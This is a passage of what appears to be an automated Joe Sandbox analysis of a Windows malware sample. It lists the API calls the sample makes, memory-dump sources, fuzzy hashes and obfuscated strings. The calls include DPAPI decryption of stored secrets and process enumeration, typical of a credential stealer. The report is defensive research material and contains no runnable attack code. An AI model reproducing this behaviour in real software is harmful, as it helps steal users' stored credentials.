                  • ExitProcess.KERNEL32 ref: 006369DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: 395415c54b4008f49117bfdf63aecf741e0cfa4d52dcea60fab69bafbae7c61c
                  • Instruction ID: 11b60990769327a614292fa8f971b25b55c5c61d7eebf512c6155bb228eb779f
                  • Opcode Fuzzy Hash: 395415c54b4008f49117bfdf63aecf741e0cfa4d52dcea60fab69bafbae7c61c
                  • Instruction Fuzzy Hash: 4A21EB75D10209ABCF08EFE4D945AEEB7B6BF48300F04852EE406F3250EB745604CBA9
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0062724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00627254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00627281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006272A4
                  • LocalFree.KERNEL32(?), ref: 006272AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 75605f9d733640ba34ac3ba6dfc34ba035766ead3bf92d021ce62121c61c7d52
                  • Instruction ID: a9fa8d55ae8a783c9316eb70e75e1a550d0b20d4d095043a4f8d0b54e12a4faf
                  • Opcode Fuzzy Hash: 75605f9d733640ba34ac3ba6dfc34ba035766ead3bf92d021ce62121c61c7d52
                  • Instruction Fuzzy Hash: 7A010CB5A40208BBEB14DFD4DD4AF9E77B9BB44B05F114158FB05BB2C0D6B0AA018F65
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0063961E
                  • Process32First.KERNEL32(00640ACA,00000128), ref: 00639632
                  • Process32Next.KERNEL32(00640ACA,00000128), ref: 00639647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0063965C
                  • CloseHandle.KERNEL32(00640ACA), ref: 0063967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 9e310624343e758d97e90415f050ce492a7da18dbf95a4abcf4580c17b742871
                  • Instruction ID: f790988bea492deba1cb4a3cfc53258779ee0e7a8c0de9887bd9f50c44769f6f
                  • Opcode Fuzzy Hash: 9e310624343e758d97e90415f050ce492a7da18dbf95a4abcf4580c17b742871
                  • Instruction Fuzzy Hash: 7D011E75A01208EBDB14DFA5CD89BEDB7F9FB49700F104198E909A7250D7B4AB40DFA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Qoj$\R~$}-]{$c<J
                  • API String ID: 0-389944241
                  • Opcode ID: a673242ff234585e5a28440208944c60f8bb66207bb09f1d2bffe481393c2d1b
                  • Instruction ID: 1e1cf828290a7c713959a6f3cb30c8600c0d204e7f22a6c0112bc0ad1db795eb
                  • Opcode Fuzzy Hash: a673242ff234585e5a28440208944c60f8bb66207bb09f1d2bffe481393c2d1b
                  • Instruction Fuzzy Hash: FCB218F360C2049FD304AE2DEC8567AFBE9EF94720F16893DEAC5C3744EA3558058696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0vs$8k[z$_vg$|=~o
                  • API String ID: 0-730756381
                  • Opcode ID: b79b03ebf3ead7a0d43e6f5bc36651df9123c93d8e8c82a7df2b7da3381d0666
                  • Instruction ID: e15c2e3287d22acbdddeac188f0f879985c71fa69a6aeea39d54efa6100a3517
                  • Opcode Fuzzy Hash: b79b03ebf3ead7a0d43e6f5bc36651df9123c93d8e8c82a7df2b7da3381d0666
                  • Instruction Fuzzy Hash: 16B2F5F360C204AFE7086E29EC8567AF7E9EF94320F1A493DE6C5C3744EA7558018697
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: yo{$91Pk$PS]$T7?
                  • API String ID: 0-2497957618
                  • Opcode ID: d874fbd446a459e4fbff65c3da4c1eee106217402b6e4e15fee7d98dbbf88b3e
                  • Instruction ID: 0132c2166d14e1fe65bc3969ddac5eb0c3aec968cbe85705f779860555c6dc3a
                  • Opcode Fuzzy Hash: d874fbd446a459e4fbff65c3da4c1eee106217402b6e4e15fee7d98dbbf88b3e
                  • Instruction Fuzzy Hash: 28B2F3F360C204AFE3046E2DEC8567AFBE9EF94720F1A493DE6C4C7744E63598418696
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00625184,40000001,00000000,00000000,?,00625184), ref: 00638EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 16b891bfc747e251ee3642b755c61db89f07524db1e1f0a43f75c7830420cab3
                  • Instruction ID: 721b068fba633070527f393980a342c85ca3fc4f741491bd537fa045b73f156b
                  • Opcode Fuzzy Hash: 16b891bfc747e251ee3642b755c61db89f07524db1e1f0a43f75c7830420cab3
                  • Instruction Fuzzy Hash: B1110674204308AFDB04CF64E884FEA37AABF89340F10A558F9198B250DB75E941DBA0
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0131F088,00000000,?,00640E10,00000000,?,00000000,00000000), ref: 00637A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00637A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0131F088,00000000,?,00640E10,00000000,?,00000000,00000000,?), ref: 00637A7D
                  • wsprintfA.USER32 ref: 00637AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: 313534d0e78188fd4aebc9e1db89b33cff0de2a6781cfceaa5cc07a5fa72e7ed
                  • Instruction ID: 861333ceb8d8860f25ab404653ecb2c84b8e5338c5fd869e20c5d06c778357cf
                  • Opcode Fuzzy Hash: 313534d0e78188fd4aebc9e1db89b33cff0de2a6781cfceaa5cc07a5fa72e7ed
                  • Instruction Fuzzy Hash: 6E1161B1945228EBEB24CF54DC49FA9BB79FB44721F1043AAE91AA32C0D7745E40CF91
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /Z-$P?}$,|{
                  • API String ID: 0-573491483
                  • Opcode ID: be0cfcab6ecc91311f1896eceeb3761a67e477afb6f958523322574be62027ac
                  • Instruction ID: 67c3f702a6db783a0afd66d1f865fa7bdd7ad727b0fface414bfbfca2d53a90e
                  • Opcode Fuzzy Hash: be0cfcab6ecc91311f1896eceeb3761a67e477afb6f958523322574be62027ac
                  • Instruction Fuzzy Hash: 7FB2F9F3A0C2049FE3046E2DEC8567AB7D9EF94720F16853DEAC4C7744EA3598058796
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ;Aks$=@_4$lX1
                  • API String ID: 0-4188162932
                  • Opcode ID: da88e19335446a9adc5f9473c99729054d179707ed2af3592ee58004d6baf57e
                  • Instruction ID: 5891a01422de39d14642ed0348212bdcf8293480565eec09d45eeb1e503481e0
                  • Opcode Fuzzy Hash: da88e19335446a9adc5f9473c99729054d179707ed2af3592ee58004d6baf57e
                  • Instruction Fuzzy Hash: A3B2E2F360C6049FE304AE29EC8577AF7E9EF94720F1A893DE6C4C7744EA3558018696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: *f|r${[{$C<
                  • API String ID: 0-841349331
                  • Opcode ID: 257ae365996c9fbc382ff9f8100ad767395dca811f4177fa153274fc577d4b30
                  • Instruction ID: 7cf0e223ba2f03d01d2c593688618285316fefc242d02e8b8f2747134a00fa7a
                  • Opcode Fuzzy Hash: 257ae365996c9fbc382ff9f8100ad767395dca811f4177fa153274fc577d4b30
                  • Instruction Fuzzy Hash: 48B2F4F360C204AFE704AE2DEC8567ABBE9EF94720F1A493DE6C4C3744E63558058796
                  APIs
                  • CoCreateInstance.COMBASE(0063E118,00000000,00000001,0063E108,00000000), ref: 00633758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006337B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: 1d815c2e0695480bde9c599c66bf2cfe4e094d7faa1203d061d7eb71187edd7b
                  • Instruction ID: e765a399961cf2b6fc6dcde52c76523d4ff64a1cb60de3df965273bb62546ce1
                  • Opcode Fuzzy Hash: 1d815c2e0695480bde9c599c66bf2cfe4e094d7faa1203d061d7eb71187edd7b
                  • Instruction Fuzzy Hash: 0C41C770A40A289FDB24DF58CC95F9BB7B5BB48702F4051D8E609A72D0D7B16E85CF90
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00629B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00629BA3
                  • LocalFree.KERNEL32(?), ref: 00629BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
